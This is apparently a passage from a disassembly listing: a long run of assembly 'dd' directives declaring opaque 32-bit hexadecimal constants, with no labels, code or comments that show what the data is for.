		dd 9C82AA41h, 7018D839h, 372CA108h, 4B732D15h, 163954FFh
		dd 47FC8F3Dh, 0C8DFDA26h, 954DC3A5h, 0F29D3FBFh, 673C7EEFh
		dd 0C9397AFEh, 15838A40h, 7E2B28Bh, 0E144AEE8h,	54FFC379h
		dd 768D748Eh, 57F355ABh, 0F2A477Ch, 0BD41F31Ch,	32BE7D53h
		dd 0B2709989h, 30BA0A43h, 989ACA97h, 7A68B5C8h,	9A206C1h
		dd 705F48FCh, 34125353h, 9048F2A0h, 0A811193h, 99819AD0h
		dd 6E1B7EA3h, 0EF82F878h, 0E3E85C32h, 0FE64B780h, 912463BCh
		dd 86922B9h, 0AFC0983Fh, 1719FD29h, 6BAAF1AAh, 463EC66Dh
		dd 0C3188888h, 7FA56CCEh, 0C57B9AE0h, 9440229Ah, 0FAEA853Dh
		dd 68CCC8F1h, 0EC5237E7h, 0F6238281h, 0DD7318BBh, 0AF49CAF3h
		dd 365922CEh, 5133EC0Fh, 69C458F4h, 0E5C53E55h,	0F6C231EDh
		dd 86D1171Ch, 0E6756C40h, 5E2925B3h, 0CBCEF595h, 0D76FD2A5h
		dd 51845A2Fh, 0E75D471h, 8E9423AFh, 0AB68CA1Fh,	38C4DC59h
		dd 0AD5DFC4Bh, 0FEDE7179h, 0D2A26525h, 9ABCF836h, 49D1A2A0h
		dd 3B85AAC3h, 0FF89A6CEh, 185BFD5Eh, 0D7D05C88h, 529F3B5Dh
		dd 72EDB6BEh, 5F74CE0Eh, 48E32BB4h, 0CADA7FAh, 0A23A6AEAh
		dd 719728F0h, 197EF4B0h, 24485E7Bh, 7163C93h, 9DCDD17Dh
		dd 1ADDCBBEh, 0E1AB9E27h, 40F6087h, 0AC448E04h,	0D7F4DFBEh
		dd 8C587F99h, 6104D02Ah, 0BAFBCBADh, 0CF9CF6D0h, 62A5A488h
		dd 848BF33Ah, 752C45A5h, 6B81B446h, 0A7ABF6ABh,	0ECBC6B66h
		dd 0E637482Ch, 589755EFh, 23C2AEEBh, 9022C3FFh,	43C5D218h
		dd 9228359Eh, 2B54B593h, 0D0906C24h, 7BFB40h, 0B553D726h
		dd 6C3E2C9Dh, 856D4B9Dh, 9C193159h, 44E98A98h, 0D58013EBh
		dd 0C2509893h, 0C0F3731h, 1AB561F7h, 0D6828B67h, 0E6033F60h
		dd 985838EAh, 0F45B3AC8h, 9ADD3757h, 91D160C1h,	15E60467h
		dd 0C9DE6495h, 0F04C1CCFh, 0ACA7162Bh, 0D4F875B2h, 0B76F37A2h
		dd 56885428h, 57297223h, 607CBC3Dh, 2DBE24C4h, 91A01478h
		dd 0DC04E65Fh, 15A52F6Eh, 0C523A6C2h, 0DC6195BBh, 8BB0A2E4h
		dd 49E8D52Bh, 0E67FF4A7h, 229C82D9h, 833D4C7Dh,	35771C3Ah
		dd 0C40EECB0h, 0E316F1Dh, 0C25557D8h, 7254AEB9h, 0B5460B44h
		dd 672CA873h, 0F71617EFh, 0D4CEA49Bh, 309812h, 7AB3311Dh
		dd 0CFBFB7D5h, 4577A678h, 876D0625h, 70D66A70h,	155CBB6Fh
		dd 7E8C6437h, 95E21EA6h, 0DD015AEBh, 32925A20h,	11BB07CBh
		dd 54417064h, 0C29CE5FDh, 7294D143h, 0A030E897h, 2174A9Ah
		dd 8B733ABCh, 0C20EBA7Bh, 40C94ED4h, 9D95D47Dh,	1931322Dh
		dd 0AFDB73FAh, 0F1ED7FD5h, 27F0F35Ch, 0E87847DAh, 0AEB187E2h
		dd 0EF5765EAh, 2B65CD8Eh, 0A8DECA7Ah, 266A629Ch, 1F01657Eh
		dd 93B189F4h, 0F2513A49h, 0EECA5EAAh, 0E6DA646h, 0B4C9CE63h
		dd 0C1C980BFh, 257E91E7h, 3AACB4DEh, 0EF6878EDh, 0EF83D137h
		dd 13097112h, 0E75D5623h, 78C903EBh, 0D0E216CAh, 2D44BA14h
		dd 0F1F2D4B5h, 0DFA75703h, 0D70E762h, 4D927B27h, 0B2CDB27Fh
		dd 0CB14FE88h, 2C5D08CEh, 0A9DA4B15h, 177483C4h, 0DB50DF1h
		dd 54EA2E4Fh, 0B1D65409h, 0CC9B28B3h, 2FE141E8h, 0FFB115C0h
		dd 9D469D59h, 6B04B2FEh, 2A51BF9Dh, 21B58AE4h, 98D2A76Bh
		dd 0E5AA6F6Dh, 68AD0923h, 8AD99584h, 0E02D6DAFh, 3CFB2087h
		dd 841B16F7h, 5D3DE9BDh, 7914DC78h, 0D5258876h,	0E05EB4BBh
		dd 4812C308h, 54A1A69Dh, 0A8D5BE5Bh, 748C5087h,	9190A1C8h
		dd 759DE5D4h, 60F3A74Dh, 0ABA1848Ch, 7BB8AB9h, 0AEF25A45h
		dd 0A92F5A91h, 3909A29Ch, 1DA364A6h, 308AF56Eh,	0AB4A669Dh
		dd 3732BA44h, 3687F971h, 7D219A93h, 0E722E363h,	3AF3F9F3h
		dd 9DFC14C9h, 60CA6497h, 74BD3F0Fh, 17912A4Dh, 0FAA6FB79h
		dd 4D1EBB4Ah, 979E38D9h, 7204E297h, 0E3EEF55Fh,	0AACB5977h
		dd 0A2FB7870h, 24C5FDA4h, 323D6093h, 0D6B96C9Fh, 5FAD81E9h
		dd 0CC405915h, 953F726Ah, 0AF0D79C0h, 5957BEDFh, 17D8D60Eh
		dd 0FF250ED6h, 11B8B78Dh, 0F3CF1CC4h, 8E7964CBh, 0F2C4DA33h
		dd 7078F7D2h, 0E54C410Bh, 0C117383Eh, 8C85EE1h,	0B05CE72Dh
		dd 0EE14D973h, 290F4DA3h, 154651A6h, 451731C4h,	0AE344EE7h
		dd 51C4F4DAh, 0BA323F13h, 0C552FD1h, 2AF5744Fh,	0B66A65A8h
		dd 3F5937Fh, 0A8A5C2D9h, 0CDB32BE6h, 7A5BAA26h,	802D509Dh
		dd 0B7D4A413h, 1ED2E0EDh, 92F61BEFh, 0D6081DCBh, 0CD5E5777h
		dd 9B44FB8Bh, 6686ACD6h, 8152A199h, 6EB0872h, 59E87B5Fh
		dd 552E4572h, 0B26EAC58h, 4C903A80h, 0B9365416h, 3AFD136Eh
		dd 0D7653948h, 0BB855CB2h, 0AFDA86AAh, 0C0C18E08h, 4425570Fh
		dd 0A4EE4A29h, 3D8D69A5h, 28A958B0h, 58F38C56h,	89814CDBh
		dd 0F18AAB91h, 6A2FFBC3h, 0C281A0B8h, 0B670552Ah, 28901A5Ah
		dd 7C51FC44h, 0E8F16470h, 12BFDC3Ah, 0D6899E59h, 0DD538B33h
		dd 0C709F442h, 0AFC20149h, 9AA5EC62h, 6A23D6C0h, 0EAE076B4h
		dd 0AF7E3F4Ch, 7E451E4Ah, 4222AF01h, 0EB36C639h, 9A8B0615h
		dd 0F8689DC3h, 38DD4AA1h, 538FDAA9h, 0E2CC7FB6h, 26DA462Fh
		dd 3B9A5DFFh, 8ED42833h, 3A53E46Dh, 84A5AA32h, 0FC32168h
		dd 0A9D8931Ch, 59F1236Ah, 96264BF1h, 0C4293E94h, 0E5F2D3C4h
		dd 79C5182Dh, 0A77D5E7Bh, 79C040F1h, 5D7DFA6Fh,	0F28F0488h
		dd 0FA979A76h, 70B6051Eh, 24CBE3EEh, 5D1DFFE7h,	0A371B6B9h
		dd 0A36ED029h, 0AAAF9AB5h, 52986FB1h, 6DDE48D7h, 2699B03Ch
		dd 76179785h, 0D87097B4h, 0B4792DBCh, 3D75C730h, 0DF444BADh
		dd 62FE5190h, 0BE59E6D2h, 9FCAAFD5h, 22353774h,	0CAD30D86h
		dd 0DB5DB1C8h, 1B1CF4B1h, 533817B3h, 1EF6D020h,	7E8A6D5Fh
		dd 523781B4h, 0A9ED42D6h, 7C353BFDh, 62A85B75h,	0FE6B3B89h
		dd 9C62DA21h, 0E854CB96h, 0C754CCDh, 8FE21961h,	57651F09h
		dd 0BDCA35B0h, 37DA9539h, 9D531A25h, 586AEAF3h,	72B2E27Bh
		dd 1972D213h, 7C252311h, 0AB607224h, 0C7361F46h, 0F587EFFFh
		dd 71869A2Bh, 951BE36Eh, 98652AF2h, 0AD57E8B3h,	0DF87A86Bh
		dd 9CDAA52Ch, 4A29936Eh, 0E73D5D56h, 0AD31472Eh, 0C02D78DAh
		dd 0BEA3794Bh, 4A7932ADh, 7C09BF33h, 0BBF9F98Ah, 0A3DD1080h
		dd 1468F7E5h, 0B3E61CABh, 56AD2134h, 0BCD57D8Eh, 0F7145B86h
		dd 94331E84h, 3FE6C921h, 69E18C0h, 0C95D62DEh, 699220B9h
		dd 88849F3Bh, 58B81385h, 7DCEDAFEh, 45959675h, 6C939032h
		dd 51A2C215h, 10EFA97Ch, 0B210ACC5h, 4F33870Fh,	81839288h
		dd 8AA55ACCh, 0BA82B5C9h
		dd 7EA2D4F7h, 0A9685543h, 22CD1370h, 6A8EDA8Ah,	0B9AC6DFCh
		dd 428D7735h, 170B8B07h, 0FD6FFED7h, 0B34FEF4Dh, 0A2BAE292h
		dd 0E4F5E985h, 5C57D675h, 3A1BB33Eh, 9D2AE3D9h,	2211A362h
		dd 0A9CD2CE1h, 3A87ABF3h, 0D2F92990h, 0E55C5AC4h, 0F67E522Dh
		dd 0EAE526EFh, 0A750D134h, 52EE7B95h, 5CD86539h, 0A5FCC515h
		dd 2AA84D61h, 3B5928A7h, 0FB7192CDh, 514A67ABh,	0E04ECA82h
		dd 9632F4C2h, 0D379BB04h, 7C1646D9h, 0A84CCFE0h, 0BAE482F1h
		dd 7F853F12h, 9E657F7Fh, 395B303Fh, 0E2D5B8A0h,	0B28D306Eh
		dd 5416A7AEh, 0EFE74CFAh, 0C0FB026Dh, 0EE9117F5h, 0EB6CB847h
		dd 9FBB778Ch, 0A34C15BCh, 2D937065h, 0EB2DAA4Bh, 6892EF70h
		dd 8F591B35h, 7EFFC315h, 0C664C729h, 786BB259h,	5F590A29h
		dd 0B13866C5h, 3295CDE0h, 0C27569F9h, 6F97C27Ah, 0B39A59D7h
		dd 3199BA17h, 487B5402h, 0B84DE275h, 6D5D1A24h,	0FAEEB3D2h
		dd 3AE3D348h, 0AF3EE56Bh, 0E4524ECAh, 0EA3AB372h, 473FF56Dh
		dd 17F472A6h, 9A59EDDDh, 594DCBF0h, 2E120A14h, 0CA3224AEh
		dd 41D7A99Dh, 0E3E83064h, 0ACE2A774h, 980F643Ch, 970FB6DAh
		dd 0DD6F9C0Fh, 0F220C358h, 1FC5A8E0h, 3BD5C389h, 0CB5A4686h
		dd 4709AD59h, 4FF4030Dh, 0F9FB467Fh, 0CEB7E2D2h, 0F32AF943h
		dd 0D985E895h, 8841C321h, 6DF151B8h, 0A3352832h, 82467F9Ch
		dd 0D4C34CDEh, 85E400BFh, 0ED4B5BADh, 9FEDBAEDh, 8A23B633h
		dd 29410E55h, 0B6789FE6h, 753C2FC9h, 0F76AF870h, 0B4A69456h
		dd 762427B1h, 2F70AC14h, 3CD6F325h, 9EF9EB15h, 4446E0DFh
		dd 70A3DAEBh, 1356F79Eh, 0A9B947DDh, 0E9D58DE5h, 0C0C4BE8Fh
		dd 0C17A197Bh, 0F5B4AD0Fh, 6313066h, 8185377Ch,	0A553EC0Ah
		dd 930C97B2h, 0E9517E53h, 7A33EB34h, 0C195B466h, 44FE3ADAh
		dd 0ADDF7CD2h, 17E5ABEDh, 0B775B98Bh, 1F36DAA1h, 0E041B062h
		dd 2D5AAB2Eh, 77415728h, 0B5378B7Bh, 219B7F36h,	624457D6h
		dd 110AE39Eh, 44FF9A63h, 36A6F6CDh, 0F4AC581Fh,	2A539E66h
		dd 9CA593D2h, 68D039A7h, 0FA35DF8Bh, 0B8059EB1h, 0C28DCEB1h
		dd 607F24E6h, 0F4BFCEC7h, 0AA477E7Dh, 0FC69BECDh, 7CB35DF9h
		dd 98E66399h, 579F11Ch,	381F144Ah, 1306DDA5h, 90725DB6h
		dd 2E62FB32h, 0CAADB6F1h, 0AFDAA511h, 0F957BBF3h, 509679FDh
		dd 0FC05E8Ah, 4ABA0761h, 41D566E7h, 0D14470F4h,	27EF0772h
		dd 7BB7BDEEh, 0E4AEB67Fh, 0F9285C3Ch, 66D54735h, 0E7BC8426h
		dd 0E43FD058h, 0A5BA929Ch, 5B6C1BB8h, 3F9A897h,	9AAF3FD7h
		dd 5775B418h, 8D6A65D5h, 8FF35273h, 25C6BDA1h, 6EED64AFh
		dd 4DD58BE4h, 0B1444FB6h, 62FF4C70h, 9FAC28DDh,	67FBE25Ah
		dd 3C9BC017h, 11988C5Fh, 11F8B886h, 5F9B034h, 9D3ED07Bh
		dd 91EFD7FCh, 0D309E838h, 80F442B3h, 98806ECEh,	0CFB54D42h
		dd 32582FD4h, 74B9381Eh, 8CB67CAEh, 311EAC55h, 1F53A57Fh
		dd 0FA50E3ECh, 0BF1F9B97h, 0EB6268B3h, 0C53E89A1h, 9BE760BCh
		dd 0C931947Dh, 0F6FD17C4h, 51E7A241h, 0A30BEBEBh, 17B4D521h
		dd 0A85484A1h, 0C3324E5Fh, 7DA21B08h, 0DC1D44D5h, 99DF1491h
		dd 5D43FEB6h, 97F5CB14h, 82792D36h, 8865A394h, 0DAF0D54Bh
		dd 625E40DBh, 0BE9CD054h, 0B58908EBh, 0BD739132h, 0C4D6E526h
		dd 0EA01930Bh, 8BD0CDA4h, 9EB58436h, 2C9AD329h,	0F87A32DCh
		dd 8B6C3D5Bh, 0B1523E7h, 5F5D6E4Ah, 9E7F6FE9h, 99B6306h
		dd 9F0B6172h, 0A584E991h, 0D7C6D79Fh, 0AD63E328h, 0D8EF76CFh
		dd 2590A3BAh, 4BF3EA6h,	19F84B4Eh, 0E53A76DFh, 0B2FB17E0h
		dd 0CDD44Ah, 0FC4CC96h,	588B437Dh, 438D7ED6h, 0D03146F7h
		dd 0BBE090B7h, 5C3CAC69h, 4D78913Eh, 0BE389097h, 8F82D9A7h
		dd 0BED67E3Fh, 0EBF55923h, 4751D05Bh, 16BF9578h, 7D59A8FBh
		dd 94F1906Ah, 8ADAEC15h, 0CA137D61h, 0E307FC45h, 90EFA087h
		dd 4F71F16Bh, 2AA49B8Dh, 6E4AEBACh, 31EC9954h, 2CB1BCE8h
		dd 3FBA10A0h, 0D6D7EC05h, 0E5BEAA65h, 0E31915C1h, 82714F97h
		dd 570B8501h, 68B599D1h, 3F68D20Dh, 0B739E259h,	0C45ABF2Dh
		dd 22D97722h, 25C7E3ADh, 0F4B37ECAh, 6B7DF462h,	0FF7C0CBCh
		dd 7ED9CFEEh, 416A07BBh, 5A8C17D9h, 57FA2FCh, 0D1F8A899h
		dd 0B56C017Ah, 0F85EDA73h, 0FAF36DD5h, 8B24C75Ah, 0A3CA239Dh
		dd 0AD683F0Dh, 0F0108104h, 58BA66E1h, 7157C270h, 0B9D16D66h
		dd 0E6A9C354h, 392B9D82h, 7D595A20h, 7D52F29Bh,	6352A260h
		dd 5FD1FC2Ch, 7F3F5FC1h, 9D5543D9h, 0A9711C7Dh,	727AE74Ah
		dd 0E91A9FB7h, 5DCDEB4Fh, 0D6766974h, 0D7F54DB1h, 0E37E50C9h
		dd 87E10ACh, 0C9ED02D3h, 62E6278Ah, 0BB1B23FDh,	7D8A32B5h
		dd 0ED6D11A6h, 3255AF0h, 0A9AF5B2Ah, 57B489E2h,	7497092Dh
		dd 47C75C8Ch, 0F09A97AAh, 2E4E62C8h, 350827C0h,	7599624Eh
		dd 0AFE85FACh, 73F6DE0Ah, 939EC5E5h, 5567E491h,	12685E65h
		dd 4ABCB934h, 7F4B9FA9h, 44B9A9DBh, 0C531D93Dh,	0C53B3A55h
		dd 989A7D8Ah, 7E7EEB1h,	0C402DE2Bh, 25AC02C8h, 6A631E29h
		dd 0A1F83F9Dh, 177CAD6h, 0CB5F1895h, 93DA129Eh,	0E7DDDDCh
		dd 71BCF93Fh, 0BD4C5C7Fh, 0A286F6CEh, 4F6A4735h, 1E5CEEE4h
		dd 0FC833F38h, 912B27B5h, 1D613EE0h, 69663B03h,	0ED9A1883h
		dd 5B45E157h, 9E0FFCCFh, 0C78AB130h, 0EA0FAA28h, 2EFD5940h
		dd 0AEC39DADh, 265C5E28h, 82D1E277h, 46B03E97h,	442359Dh
		dd 0F6AD4A6Ah, 65F45715h, 66F42F37h, 17455CE9h,	0EAB60B65h
		dd 0E6BAF871h, 1CB7188h, 8EA6FDDh, 1730DF36h, 6E95D428h
		dd 68A74AAFh, 0B6C70AF3h, 2D5B71F8h, 5898B092h,	7D4B270Eh
		dd 49B12F7Dh, 8C4B7936h, 0D1B2E65Bh, 64BAF75Eh,	718D5FDBh
		dd 0B5C77AA5h, 13BA4B46h, 515885AAh, 0BEE7B07Eh, 6824BC6Fh
		dd 0C9090AEAh, 93F2126Ah, 7A9D6449h, 1629EF7Eh,	43F14C5Bh
		dd 0CBED60B8h, 0D89491ABh, 10AEDA91h, 9147C15Bh, 7D599406h
		dd 27196886h, 966DD819h, 0D268706Dh, 0FA3A1096h, 9D0DABD0h
		dd 0FAECF8B5h, 0F7D8D5A2h, 98B6B9A7h, 2CE0E96Bh, 1676088Ah
		dd 0B1FD3D32h, 6398359Ah, 6CCA5BD0h, 0A446B230h, 2CDCFDBAh
		dd 0F81A90FCh, 51A75F93h, 0F5DDA960h, 0F85449AEh, 8E131804h
		dd 56A52A99h, 2EBCDA75h, 40CC78AEh, 0C1757E60h,	0A377382Bh
		dd 24C509B5h, 608A9599h, 0CD3D634Ch, 0FBD8BE24h, 5735BB40h
		dd 97F71E37h, 0FB8F5FA8h, 88D64377h, 0AEEE2FFh,	0AF00766Ah
		dd 2E0C6B93h, 0AF79AA79h, 0B4A258B7h, 48628789h, 4E3946E3h
		dd 89F568BDh, 6E6B4F02h, 26080FC0h, 0DDFC2D9Dh,	209D5A09h
		dd 0FA45EFE6h, 0A0E2B2CEh, 6CE5E97Fh, 2E48DE16h, 0D347F55Bh
		dd 29111287h, 37547BA2h, 0DF1559FEh, 61E5586Dh,	73128BF7h
		dd 3576EBADh, 6C98DE65h, 5FB4A18Eh, 5F35462Dh, 0FE55303Dh
		dd 9B1E0321h, 57801644h, 8EA4F86Eh, 1D0B1148h, 33C9629Fh
		dd 0C5F481D2h, 82FE6B90h, 0CACD7F7Bh, 8D8C8B65h, 0F3FAE75Eh
		dd 84268410h, 69E32E1Dh, 0C3DDEE60h, 0B03F981Ah, 18D59992h
		dd 495E3337h, 0FD8F72D1h, 0CCD7B0D3h, 25297C65h, 8FBC78CAh
		dd 774779CDh, 0D2306959h, 6AA0E680h, 570CA5CBh,	84165B36h
		dd 5E88599Eh, 91F7832Bh, 0F8690B44h, 4A7E6E42h,	822F1637h
		dd 7D6B7731h, 0F1FFF9ADh, 0FC18B7A0h, 32AF7BBEh, 93DAB5D2h
		dd 0CA5F3AC6h, 9C9C5A1h, 8C0FC3A5h, 0CB8AA47Fh,	6186262Dh
		dd 0B33ABB85h, 6DE52Ah,	0EDC8EAFh, 5A5542CDh, 0E13B4251h
		dd 0A77325E3h, 653C29E8h
		dd 0D3436714h, 1A4DB437h, 0CDF1847Dh, 0E63680C3h, 0A85A7C7Ch
		dd 0F0B38BDCh, 3E24A085h, 61F88577h, 100CFEF8h,	56C0B81Eh
		dd 739A1764h, 0A267F397h, 0D5CF4ACDh, 14ECD756h, 46891D1Fh
		dd 0AC28020Ah, 4AA267FBh, 0EB65DCD8h, 0ED7A8783h, 21847416h
		dd 0F128D645h, 0CA66F079h, 0B17A9F19h, 0B6CAC2BEh, 8132DD94h
		dd 621C0005h, 8BF73CAh,	0D6AE86CBh, 1FB4B3B8h, 57FCAEE7h
		dd 79693D2h, 0FE45E0CDh, 6F8A1F8Ch, 7CE098E3h, 0CE2B115h
		dd 0B116581Fh, 4AE096ABh, 48B4737Bh, 0EC8773Bh,	8B04DDD4h
		dd 59666F49h, 0E878572h, 379029EBh, 208BDF8Bh, 0E670492Dh
		dd 0F0E18A9h, 0CB3DFD1Ch, 0FB7971DDh, 8964ED58h, 0F2EB144h
		dd 510F51ADh, 1DB1554Fh, 0E7E0C370h, 96DA317Dh,	0F2EDA44Eh
		dd 0F495CE76h, 0A81899FBh, 0B16C5A34h, 7AF25624h, 0C3AD0A77h
		dd 0CCEB4576h, 80B30ED6h, 43F19BF7h, 445780EFh,	0C966316Fh
		dd 894817B7h, 7CD91F70h, 0A8B1DF99h, 5ABF3AEAh,	84A2595Bh
		dd 0C6699D33h, 0E8F5B496h, 0CE5A080Ah, 45CA8FD4h, 0C1DD3D5Ah
		dd 675775B1h, 290CCFB3h, 25CEC98Ch, 673B874Fh, 0A28C8C35h
		dd 86536DA5h, 0F17D9A95h, 97FC733Dh, 111B647Fh,	7F6C0294h
		dd 1C5FB761h, 58DBDA77h, 6E3FBFBFh, 0C0E1C8E2h,	18871C37h
		dd 267EAB1Bh, 0F52D2ED1h, 0A41EF31Bh, 0ED261A09h, 2094A0BCh
		dd 0A153B371h, 52C7567h, 0D303FAE0h, 84CF79A2h,	0DB46C42Ah
		dd 2045DCF6h, 4E015D71h, 0A284DA6Eh, 55C2AADh, 0BC88EBE7h
		dd 76D08C3Eh, 6F940158h, 0D5C07B71h, 0DFDB5E74h, 22BA55A0h
		dd 5E55CF4Eh, 49FDD15Ah, 0D6375207h, 0FB29DE27h, 585BBC0h
		dd 0CE16D0FCh, 2090FE05h, 2C6AF3ADh, 72F28309h,	0A12BBA58h
		dd 4B144F7Ch, 60390464h, 73A1CA7Bh, 0BE809C1Eh,	56A38D6Ah
		dd 90E0C1F3h, 97E81B57h, 0DD9FFBDEh, 0AA141F49h, 0B0946AEEh
		dd 374C2548h, 37D22FE1h, 1BA52B5Ch, 0B58A0AAFh,	1A0AC53Dh
		dd 84050987h, 596FEA41h, 0DA3977B7h, 926312BBh,	0EAAE7F93h
		dd 1EDD1239h, 0C2CB31B7h, 9E68E798h, 0C3EF3E6h,	6EA9A518h
		dd 0DBD53739h, 0C8A354FAh, 0B6750D62h, 562459D1h, 9CBCB7F0h
		dd 1E491AC1h, 59D8E881h, 490F6D57h, 973398D6h, 0E44B8910h
		dd 8DEBBB81h, 0A1EFEC5Bh, 0BFEBBB8Fh, 938CECDFh, 5DE9AE5Ch
		dd 7B5ADD62h, 68CA4D97h, 3612BFBFh, 8DA9FA21h, 8C0FA943h
		dd 0C0E93E10h, 46E1CA63h, 520B4D05h, 0F9A9DB4h,	0DDBA442Bh
		dd 5A6186Fh, 779AA78Bh,	0B31F9A8Dh, 122E3A79h, 4F94C79Ch
		dd 0BE5BCBBAh, 2F850F78h, 0D93CC72Ah, 58259D47h, 3FCD21DBh
		dd 4A2ED6D1h, 4415ABD8h, 0DFBAB70Dh, 5E5769ECh,	5F2E1196h
		dd 7D6852B4h, 0D9B5B3BEh, 79E8CBEBh, 2959C2A8h,	4BA79327h
		dd 0C3865234h, 0E73A7F83h, 801C607Ch, 4BAF7ADCh, 2974D9EBh
		dd 3D1033E1h, 22BF3808h, 5899FEE4h, 5F9185B7h, 16AD6C69h
		dd 3CFA8D22h, 355C545Eh, 5691BE90h, 0EE83B835h,	0F12F2FA2h
		dd 4B1CB344h, 5F9FA9C0h, 95FD729h, 303C5BBFh, 6A59E4FBh
		dd 0F2EB3836h, 0B4D0EA91h, 0E9197682h, 92AADBF6h, 0CB4B1765h
		dd 0DE2548B4h, 5A27A94Ah, 0EDC5C89Fh, 0F75E5FDDh, 65C6E3B4h
		dd 0E15DE57Ah, 0D5E720F2h, 36DDCCE4h, 0E15AC1C7h, 63B1583h
		dd 0CB3218EAh, 0F668FD58h, 69CC1065h, 9CC5D81Ch, 2BB6570Fh
		dd 5A312B54h, 0F3DF8B4Dh, 0B8E7A0E0h, 20CFED2Ch, 361919A8h
		dd 9267AA31h, 0F6925448h, 8154B97Ch, 62DB2589h,	60572D1Bh
		dd 7B5659D5h, 2572BE0Ah, 7C5A614h, 5C739A76h, 79EAB0A2h
		dd 0DB730B96h, 53D3ABD2h, 925AAB91h, 0B9E347D4h, 0A6F7B6C4h
		dd 2685DD61h, 80F2C87Eh, 0CDBA6375h, 7B6EB1CEh,	1A9A14B4h
		dd 7B5D089Bh, 3E8187Eh,	0B3103793h, 8C67F879h, 3503D67Eh
		dd 0F75A33F5h, 0E0AF0F3Dh, 0B220C639h, 6E3D4E7Fh, 0FE8F4881h
		dd 0D223809h, 51F7BE15h, 0EBA42726h, 57F8E861h,	2C8D6D1Bh
		dd 866A84Ch, 77CE8842h,	1555604Fh, 0C6DEA6BBh, 0D22BB399h
		dd 0C4DF0C26h, 0F6FEE82Dh, 12F3D84Ch, 37F2948Fh, 0CC59019Eh
		dd 95CF014Bh, 8FC6556Eh, 19C5A5E1h, 4A8685E3h, 3F2B2EB3h
		dd 142FD4BFh, 0F0755EA3h, 4526C78Dh, 935A36ABh,	0FC0FD2D0h
		dd 0AEF0EE30h, 7635EAC6h, 0F3017238h, 3ED8AA80h, 1A6361B8h
		dd 87E055A3h, 1741DF01h, 7DF821C5h, 25D9F08Eh, 0A058FD4Fh
		dd 6E657ABDh, 6B84B751h, 0FC5FF7B9h, 539FABA5h,	1452352Ch
		dd 1C150AA3h, 8F28FB62h, 7A4A35F2h, 9D5F4DEAh, 749F2C76h
		dd 3717AD93h, 0A09EE179h, 46FE78D4h, 9CA487ACh,	0AA5EFF1h
		dd 4DBEB217h, 657CF909h, 0FC6CDAF3h, 41970B0h, 7D945BAEh
		dd 4E7C995Fh, 29683383h, 0FB2EA45Ah, 45C8F650h,	9C09974Dh
		dd 0EDFA43F1h, 0B676EB1Dh, 6C476CFAh, 2C0ED65Dh, 0B3CA0494h
		dd 1F644D7Eh, 0FF331A23h, 3DDBB33Eh, 0FC6F3114h, 74B7A0AFh
		dd 0C745D84h, 9D4941AAh, 7BE963BEh, 179BA555h, 0A8EA31DEh
		dd 7B68FA88h, 0F6B43782h, 48F9E352h, 3AA6C565h,	294944A9h
		dd 92624CBh, 0C2636338h, 17C195B1h, 482A3E48h, 6BFCD2B6h
		dd 311FB36Fh, 37AD2B84h, 6C25FD3h, 116931E7h, 6730DAEBh
		dd 0AC5AA9E1h, 5FF03DF8h, 7535FB45h, 0AAD7303Eh, 8824F66Ah
		dd 0CC2579F1h, 0B3DF706Eh, 0F4D0F58Dh, 43F23767h, 4A19331Ch
		dd 11787F7Ch, 63F45AFDh, 0D5DFA365h, 0A6866784h, 4FBDF43Dh
		dd 9CCE0947h, 3B9B5967h, 0BEDAC7E9h, 18CA44B2h,	8C226B57h
		dd 391232A5h, 0C9454D15h, 1351671Eh, 9C765E96h,	22297A04h
		dd 0FAF76991h, 16A7E065h, 2834F0B9h, 6882D005h,	0B697B76Ah
		dd 33467891h, 0A4B1A770h, 0E9162E88h, 2F04DA9Fh, 95003443h
		dd 2987A8DFh, 0E9E8279h, 2638E0B5h, 0CB155B7Dh,	0AAD41EC5h
		dd 2D8B68D0h, 6A1BADC6h, 7AAF8D6h, 9E8A552h, 39F7461Eh
		dd 69B785A3h, 0D354E078h, 0EE293AA3h, 70767637h, 4BFD89B5h
		dd 0B97A25B3h, 51A712A4h, 9455DA27h, 0C0F15D03h, 15F2469Eh
		dd 30713B07h, 392D08B5h, 16333AA5h, 24B44F07h, 4D1AE80Ah
		dd 76067BAAh, 70414BE5h, 0E402DB89h, 0A6F97DC1h, 55E3609Dh
		dd 721D783Ch, 913DEEEh,	5DBC610h, 0DC0EF9E5h, 0B35F96E7h
		dd 0BF5C83E8h, 2CB9DF8Bh, 0A47E361Bh, 5ED10B86h, 7795BB8Dh
		dd 0EB94C5E6h, 79F1920Ah, 0C955E1F0h, 0B6C5E629h, 0CC836B32h
		dd 235686Ah, 5A87124Fh,	5465E6C1h, 0F3BEE222h, 3309D473h
		dd 0F3765C1Ah, 0AB5A02AEh, 6E2B8D52h, 7E3824BBh, 7C9E8AD2h
		dd 0AA0F7507h, 8C39CD27h, 0C7B1CD7Ah, 8C63FC49h, 0AB85559Eh
		dd 71ED20DBh, 0DA285F3Bh, 5C1C9FB7h, 1BFD344Fh,	558A2875h
		dd 34FCD916h, 1F95773Eh, 52B4FF97h, 557E3267h, 0A6FE11C2h
		dd 18D62C79h, 3F0DF8B2h, 0B388FD0Ch, 0BC1FF7A9h, 1DCED493h
		dd 676044FFh, 0E8FFD532h, 6837B36h, 768AEDE9h, 59ACDD6Ah
		dd 0E45B656h, 6C437E2Ch, 9075B76Fh, 0A5C54DBAh,	5AD31779h
		dd 33385D8Dh, 42EF26D0h, 3FCB9768h, 0FAB1DEDBh,	12676991h
		dd 540F986Ah, 978B84B4h, 0E2FC3BE5h, 4295B8DDh,	0EE6A9964h
		dd 5B4881E4h, 668DB11Dh, 8D35C4E2h, 3DF4B665h, 496B4ACh
		dd 0FE7D8AAEh, 878BF6F4h, 4A52B577h, 0F4177DE7h, 48D1B7BCh
		dd 7F1878BDh, 0DB19CC0Fh, 56101A7Ah, 790CCC7Fh,	96D1A6F2h
		dd 0AFC8B3EDh, 98B47DBEh, 0F8A7518Bh, 0AD508C5Ah, 1F394CBBh
		dd 0A120D92Ah, 0DA65FB26h, 87B959EAh, 3708E92Fh, 8EE375B3h
		dd 0E8C39BDDh, 79F9E5C4h
		dd 15DC5DEDh, 75BC62ABh, 8960FB48h, 4BBCFAEFh, 4EC9C452h
		dd 2E7041FFh, 0A87CABDEh, 910F04Ah, 0E02C22BDh,	728C75F3h
		dd 0BFE530C6h, 675C4932h, 4791D800h, 0ABFB4C2Eh, 0BA956597h
		dd 2E349B46h, 3EB63BCh,	7000045Bh, 7513B07Ch, 80F2306Bh
		dd 910DE350h, 0D87A1C04h, 164865D9h, 0ABF2BA71h, 0A64A0A1Fh
		dd 846EAE01h, 0F1A90A73h, 3AE51997h, 639251B5h,	45865655h
		dd 4AA79FFCh, 9D2F8936h, 0C152CC4Bh, 0A4F16798h, 0AFBEA70Ah
